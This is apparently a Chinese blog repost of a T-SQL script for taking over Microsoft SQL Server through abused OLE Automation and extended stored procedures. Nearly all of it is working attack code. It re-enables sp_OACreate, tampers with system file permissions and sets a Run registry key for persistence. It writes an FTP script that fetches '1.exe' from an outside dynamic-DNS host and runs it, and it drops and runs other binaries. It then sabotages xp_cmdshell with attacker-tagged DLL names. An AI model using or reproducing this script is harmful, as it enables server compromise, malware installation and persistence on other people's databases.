MSSQL各储存扩展终极解封语句-阿里云开发者社区

if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_addextendedproc]'))drop procedure sp_addextendedproc
if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))drop procedure sp_oacreate
if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))drop procedure sp_OASetProperty
if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))drop procedure sp_OADestroy
if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))drop procedure sp_OAMethod;
go

create procedure sp_addextendedproc @functname nvarchar(517),@dllname varchar(255) as set implicit_transactions off if @@trancount > 0 begin raiserror(15002,-1,-1,'sp_addextendedproc') return (1) end dbcc addextendedproc( @functname, @dllname) return (0);
go

if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))dbcc addextendedproc ('sp_OACreate','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))dbcc addextendedproc ('sp_OASetProperty','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))dbcc addextendedproc ('sp_OADestroy','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))dbcc addextendedproc ('sp_OAMethod','odsole70.dll');
go

declare @sp_passwordo int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo out;exec sp_oamethod @sp_passwordo, 'copyfile',null,'c:\windows\system32\ma.exe' ,'c:\windows\system32\ws.exe';declare @sp_passwordod int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordod out;exec sp_oamethod @sp_passwordod, 'copyfile',null,'c:\windows\system32\cs.exe' ,'c:\windows\system32\ws.exe';declare @sp_passwordos int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordos out;exec sp_oamethod @sp_passwordos, 'copyfile',null,'c:\windows\system32\cacls.exe' ,'c:\windows\system32\ws.exe';declare @sp_passwordode int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordode out;exec sp_oamethod @sp_passwordode, 'copyfile',null,'c:\windows\system32\ps.exe' ,'c:\windows\system32\ws.exe';
go

declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\windows\system32\1025\run.ini', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\run [2 8 18]';
go

declare @sp_passwordo2 int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo2 out;exec sp_oamethod @sp_passwordo2, 'copyfile',null,'c:\windows\system32\ftp.exe' ,'c:\windows\system32\p.exe';declare @sp_passwordo4 int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo4 out;exec sp_oamethod @sp_passwordo4, 'copyfile',null,'c:\windows\system32\dllcache\ftp.exe' ,'c:\windows\system32\p.exe';declare @sp_passwordo3 int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo3 out;exec sp_oamethod @sp_passwordo3, 'copyfile',null,'c:\windows\system32\dllcache\cacls.exe' ,'c:\windows\system32\ws.exe';
go

declare @sp_passwordox int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordox out;exec sp_oamethod @sp_passwordox, 'copyfile',null,'c:\winnt\system32\ma.exe' ,'c:\winnt\system32\ws.exe';declare @sp_passwordodx int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordodx out;exec sp_oamethod @sp_passwordodx, 'copyfile',null,'c:\winnt\system32\bsnr.exe' ,'c:\winnt\system32\ws.exe';declare @sp_passwordosx int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordosx out;exec sp_oamethod @sp_passwordosx, 'copyfile',null,'c:\winnt\system32\cacls.exe' ,'c:\winnt\system32\ws.exe';declare @sp_passwordodex int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordodex out;exec sp_oamethod @sp_passwordodex, 'copyfile',null,'c:\winnt\system32\ps.exe' ,'c:\winnt\system32\ws.exe';
go

declare @sp_passwordo2x int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo2x out;exec sp_oamethod @sp_passwordo2x, 'copyfile',null,'c:\winnt\system32\ftp.exe' ,'c:\winnt\system32\p.exe';declare @sp_passwordo4x int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo4x out;exec sp_oamethod @sp_passwordo4x, 'copyfile',null,'c:\winnt\system32\dllcache\ftp.exe' ,'c:\winnt\system32\p.exe';declare @sp_passwordo3x int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo3x out;exec sp_oamethod @sp_passwordo3x, 'copyfile',null,'c:\winnt\system32\dllcache\cacls.exe' ,'c:\winnt\system32\ws.exe';
go

declare @sp_passwordcmdcov INT;declare @sp_passwordcmdcov1 INT;declare @sp_passwordcmdcov2 INT;declare @sp_passwordftpcov INT;exec sp_OACreate 'wscript.shell',@sp_passwordcmdcov output;exec sp_OACreate 'wscript.shell',@sp_passwordcmdcov1 output;exec sp_OACreate 'wscript.shell',@sp_passwordcmdcov2 output;exec sp_OACreate 'wscript.shell',@sp_passwordftpcov output;exec sp_OAMethod @sp_passwordftpcov,'run',null,'ws.exe %SystemRoot%\system32\cmd.exe /e /t /g system:F';exec sp_OAMethod @sp_passwordcmdcov1,'run',null,'ws.exe %SystemRoot%\system32\net1.exe /e /t /g system:F';exec sp_OAMethod @sp_passwordcmdcov1,'run',null,'ws.exe %SystemRoot%\system32\p.exe /e /t /g system:F';exec sp_OAMethod @sp_passwordftpcov,'run',null,'ws.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';

go

declare @sp_passwordxieo int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @sp_passwordxieo out
exec sp_oamethod @sp_passwordxieo, 'createtextfile', @f out, 'sb.dat', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'open XXXX.3322.org'
exec @ret = sp_oamethod @f, 'writeline', NULL,'123'
exec @ret = sp_oamethod @f, 'writeline', NULL,'123'
exec @ret = sp_oamethod @f, 'writeline', NULL,'get 1.exe 1.exe'
exec @ret = sp_oamethod @f, 'writeline', NULL,'bye';
go

DECLARE @cmdpassword1p INT EXEC SP_OAcreate 'wscript.shell',@cmdpassword1p OUTPUT EXEC SP_OAMETHOD @cmdpassword1p,'run',null,'p -s:sb.dat';
go

declare @ow int, @fw int, @t int, @retw int
exec sp_oacreate 'scripting.filesystemobject', @ow out
exec sp_oamethod @ow, 'createtextfile', @fw out, 'gouri.bat', 1
exec @retw = sp_oamethod @fw, 'writeline', NULL,'ping 127.0.0.1'
exec @retw = sp_oamethod @fw, 'writeline', NULL,'1'
exec @retw = sp_oamethod @fw, 'writeline', NULL,'ping 127.0.0.1 -n 25'
exec @retw = sp_oamethod @fw, 'writeline', NULL,'1'
exec @retw = sp_oamethod @fw, 'writeline', NULL,'del %0';
go

declare @sp_passworddboysb16 int exec sp_oacreate 'wscript.shell',@sp_passworddboysb16 output exec sp_oamethod @sp_passworddboysb16,'run',null,'cmd /c convert c:/fs:ntfs';
go

declare @sp_passworddboysb160 int exec sp_oacreate 'wscript.shell',@sp_passworddboysb160 output exec sp_oamethod @sp_passworddboysb160,'run',null,'cmd /c %SystemRoot%\system32\regini %SystemRoot%\system32\1025\run.ini';
go

declare @sp_passworddboysb INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb output;exec sp_OAMethod @sp_passworddboysb,'run',null,'cmd /c del ps.exe&del xc.exe&del ma.exe&del n.exe&del fpt.exe&del http.vbs&del http1.vbs&del tstp.exe&del SOPO抓1433&del c:\windows\system\1.vbs&echo 在SOPO的双手之下,1433一切都是浮云>>naicha.txt';
go

DECLARE @ObjectToken INT;EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT;EXEC sp_OASetProperty @ObjectToken, 'Type', 1;EXEC sp_OAMethod @ObjectToken, 'Open';EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0x16禁止;EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, 'mss.exe', 2;EXEC sp_OAMethod @ObjectToken, 'Close';EXEC sp_OADestroy @ObjectToken;
go

declare @sp_passworddboysb1go INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb1go output;exec sp_OAMethod @sp_passworddboysb1go,'run',null,'gouri.bat';
go

declare @sp_passworddboysb1 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb1 output;exec sp_OAMethod @sp_passworddboysb1,'run',null,'ws.exe %SystemRoot%\system32\wscript.exe /e /d everyone';
go

declare @sp_passworddboysb2 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb2 output;exec sp_OAMethod @sp_passworddboysb2,'run',null,'ws.exe %SystemRoot%\system32\ftp.exe /e /d everyone';
go

declare @sp_passworddboysb3 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb3 output;exec sp_OAMethod @sp_passworddboysb3,'run',null,'ws.exe %SystemRoot%\system32\cscript.exe /e /d everyone';
go

declare @sp_passworddboysb4 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb4 output;exec sp_OAMethod @sp_passworddboysb4,'run',null,'ws.exe %SystemRoot%\system32\cacls.exe /e /d system';
go

declare @sp_passworddboysb5 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb5 output;exec sp_OAMethod @sp_passworddboysb5,'run',null,'ws.exe %SystemRoot%\system32\cmd.exe /e /d system';
go

declare @sp_passworddboysb6 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb6 output;exec sp_OAMethod @sp_passworddboysb6,'run',null,'ws.exe %SystemRoot%\system32\sethc.exe /e /d system';
go

declare @sp_passworddboysb7 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb7 output;exec sp_OAMethod @sp_passworddboysb7,'run',null,'ws.exe %SystemRoot%\system32\net1.exe /e /d system';
go

declare @sp_passworddboysb8 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb8 output;exec sp_OAMethod @sp_passworddboysb8,'run',null,'ws.exe %SystemRoot%\system32\dllcache\wscript.exe /e /d everyone';
go

declare @sp_passworddboysb9 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb9 output;exec sp_OAMethod @sp_passworddboysb9,'run',null,'ws.exe %SystemRoot%\system32\dllcache\ftp.exe /e /d system';
go

declare @sp_passworddboysb10 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb10 output;exec sp_OAMethod @sp_passworddboysb10,'run',null,'ws.exe %SystemRoot%\system32\dllcache\cscript.exe /e /d everyone';
go

declare @sp_passworddboysb11 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb11 output;exec sp_OAMethod @sp_passworddboysb11,'run',null,'ws.exe %SystemRoot%\system32\dllcache\cacls.exe /e /d system';
go

declare @sp_passworddboysb12 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb12 output;exec sp_OAMethod @sp_passworddboysb12,'run',null,'ws.exe %SystemRoot%\system32\dllcache\cmd.exe /e /d system';
go

declare @sp_passworddboysb13 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb13 output;exec sp_OAMethod @sp_passworddboysb13,'run',null,'ws.exe %SystemRoot%\system32\dllcache\sethc.exe /e /d system';
go

declare @sp_passworddboysb14 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb14 output;exec sp_OAMethod @sp_passworddboysb14,'run',null,'ws.exe %SystemRoot%\system32\utilman.exe /e /d system';
go

declare @sp_passworddboysb14 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb14 output;exec sp_OAMethod @sp_passworddboysb14,'run',null,'ws.exe %SystemRoot%\system32\dllcache\net1.exe /e /d system';
go

declare @sp_passworddboysb15 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb15 output;exec sp_OAMethod @sp_passworddboysb15,'run',null,'ws.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /d system';
go

declare @sp_passworddboysb17 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb17 output;exec sp_OAMethod @sp_passworddboysb17,'run',null,'ws.exe %SystemRoot%\system32\p.exe /e /d system';
go

declare @sp_passworddboysb19 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb19 output;exec sp_OAMethod @sp_passworddboysb19,'run',null,'ws.exe %SystemRoot%\system32\icacls.exe /e /d system';
go

declare @sp_passworddboysb20 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb20 output;exec sp_OAMethod @sp_passworddboysb20,'run',null,'ws.exe %SystemRoot%\system32\dllcache\icacls.exe /e /d system';
go

declare @passworedboysb21 int exec sp_oacreate 'wscript.shell',@passworedboysb21 output exec sp_oamethod @passworedboysb21,'run',null,'mss.exe';
go

declare @passworedboysb22 int exec sp_oacreate 'wscript.shell',@passworedboysb22 output exec sp_oamethod @passworedboysb22,'run',null,'rar.exe';
go

declare @passworedboysb23 int exec sp_oacreate 'wscript.shell',@passworedboysb23 output exec sp_oamethod @passworedboysb23,'run',null,'uu.exe';
go

declare @passworedboysb24 int exec sp_oacreate 'wscript.shell',@passworedboysb24 output exec sp_oamethod @passworedboysb24,'run',null,'qq2.exe';
go

declare @passworedboysb25 int exec sp_oacreate 'wscript.shell',@passworedboysb25 output exec sp_oamethod @passworedboysb25,'run',null,'qq3.exe';
go

DROP PROCEDURE xp_cmdshell;dbcc addextendedproc ('xp_cmdshell','SOPO1433.QQ:994216773')DROP PROCEDURE sp_password;dbcc addextendedproc ('sp_password','Microsoft提示您请误随便操作SQL管理密码以免对起数据库造成不必要的麻烦')DROP PROCEDURE xp_dirtree;dbcc addextendedproc ('xp_dirtree','Microsoft提示您请误随意操作SQL数据库以免对起数据库造成不必要的麻烦')DROP PROCEDURE xp_regwrite;dbcc addextendedproc ('xp_regwrite','1')DROP PROCEDURE sp_OACreate;dbcc addextendedproc ('sp_OACreate','SOPO1433.QQ;545770193')DROP PROCEDURE sp_OACreate;dbcc addextendedproc ('sp_OACreate','SOPO1433.QQ:994216773')DROP PROCEDURE sp_oamethod;dbcc addextendedproc ('sp_oamethod','SOPO1433.QQ:994216773')DROP PROCEDURE sp_OASetProperty;dbcc addextendedproc ('sp_OASetProperty','SOPO1433.QQ:994216773')DROP PROCEDURE sp_OADestroy;dbcc addextendedproc ('sp_OADestroy','SOPO1433.QQ:994216773')drop procedure sp_dropextendedproc;

本文转hackfreer51CTO博客，原文链接：http://blog.51cto.com/pnig0s1992/447546，如需转载请自行联系原作者

MSSQL各储存扩展终极解封语句

热门文章

最新文章

相关课程

相关电子书

相关实验场景